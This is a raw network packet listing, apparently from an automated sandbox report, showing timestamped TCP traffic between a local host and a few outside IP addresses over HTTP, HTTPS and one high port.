Nov 18, 2023 10:02:35.632380009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632390022 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632396936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632411957 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632417917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632433891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632447004 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632452011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632472992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632482052 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632489920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632504940 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632508993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632525921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632540941 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632544041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632565022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632575989 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632591009 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632600069 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632608891 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632627964 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632644892 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632646084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.632680893 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.632698059 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633490086 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633548975 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633568048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633589029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633605957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633631945 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633635044 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633655071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633675098 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633682013 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633693933 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633706093 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633742094 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633743048 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633759022 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633776903 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633790970 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633794069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633811951 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633826971 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633829117 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633846045 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633862019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633863926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633879900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633886099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633897066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633913040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633930922 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633932114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633940935 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633949995 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633966923 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.633982897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.633984089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.634001970 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.634006977 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.634018898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.634042025 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.634179115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.634535074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.714148045 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.745177031 CET	42691	49738	194.169.175.235	192.168.2.4
Nov 18, 2023 10:02:35.803308010 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.803381920 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.803462029 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.803479910 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.803689003 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.803976059 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.804032087 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.804037094 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.804081917 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.804085970 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.804339886 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.804373980 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.804419041 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.804424047 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.804471016 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.805052042 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.805113077 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.805896044 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.805934906 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.805953026 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.805957079 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.806000948 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.806004047 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.806449890 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.806452990 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.806798935 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.806843042 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.806859970 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.806864977 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.806916952 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.807625055 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.807688951 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.807830095 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.807835102 CET	443	49745	104.21.89.193	192.168.2.4
Nov 18, 2023 10:02:35.811156988 CET	49738	42691	192.168.2.4	194.169.175.235
Nov 18, 2023 10:02:35.911756992 CET	49745	443	192.168.2.4	104.21.89.193
Nov 18, 2023 10:02:35.929821014 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.929842949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.929860115 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.929877996 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.929908991 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.929944992 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930088043 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930104971 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930150986 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930165052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930181980 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930197954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930214882 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930232048 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930242062 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930248976 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930260897 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930283070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930294037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930593967 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930648088 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930715084 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930732965 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930756092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930772066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930787086 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930788994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930807114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930821896 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930824041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930840969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930854082 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930893898 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930895090 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930912018 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930927992 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930951118 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930954933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.930967093 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930984020 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.930990934 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931001902 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931019068 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931036949 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931039095 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931055069 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931063890 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931080103 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931107044 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931114912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931130886 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931148052 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931164026 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931186914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931186914 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931204081 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931221008 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931229115 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931260109 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931282043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931303024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931318998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931335926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931351900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931370974 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931386948 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931387901 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931404114 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931427002 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931430101 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931443930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931458950 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931459904 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931477070 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931489944 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931493998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931510925 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931512117 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931528091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931545019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931552887 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931591034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931605101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931622028 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931667089 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931679010 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931696892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931713104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931725979 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931730032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931746960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931760073 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931792974 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931806087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931823015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931838989 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931855917 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931873083 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931879997 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931890011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931907892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931912899 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931925058 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931931019 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931941986 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931958914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931967974 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.931977034 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.931993961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932003021 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932009935 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932027102 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932044029 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932049990 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932059050 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932077885 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932085037 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932096958 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932104111 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932140112 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932142019 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932159901 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932176113 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932192087 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932204962 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932209015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932225943 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932243109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932260036 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932260990 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932276011 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932292938 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932300091 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932308912 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932323933 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932327032 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932343960 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932352066 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932359934 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932374954 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932393074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932395935 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932410955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932429075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932436943 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932446957 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932462931 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932491064 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932522058 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932590961 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932606936 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932622910 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932640076 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932651043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932655096 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932672024 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932687998 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932693005 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932704926 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932722092 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932734013 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932738066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932754040 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932754993 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932771921 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932790041 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932796001 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932806969 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932823896 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932837963 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932842016 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932858944 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932862043 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932876110 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932893991 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932902098 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932912111 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932929039 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932943106 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932946920 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932964087 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.932965040 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.932982922 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933000088 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933003902 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933017015 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933036089 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933046103 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933051109 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933067083 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933068037 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933085918 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933101892 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933106899 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933118105 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933136940 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933146954 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933152914 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933168888 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933171034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933185101 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933201075 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933213949 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933217049 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933233023 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933258057 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933265924 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933274984 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933279991 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933293104 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933309078 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933324099 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933326006 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933341026 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933343887 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933360100 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933376074 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933393955 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933401108 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933410883 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933429003 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933439016 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933445930 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933460951 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933461905 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933479071 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933491945 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933494091 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933511972 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933512926 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933528900 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933546066 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933557034 CET	49744	80	192.168.2.4	194.49.94.120
Nov 18, 2023 10:02:35.933562994 CET	80	49744	194.49.94.120	192.168.2.4
Nov 18, 2023 10:02:35.933578968 CET	80	49744	194.49.94.120	192.168.2.4
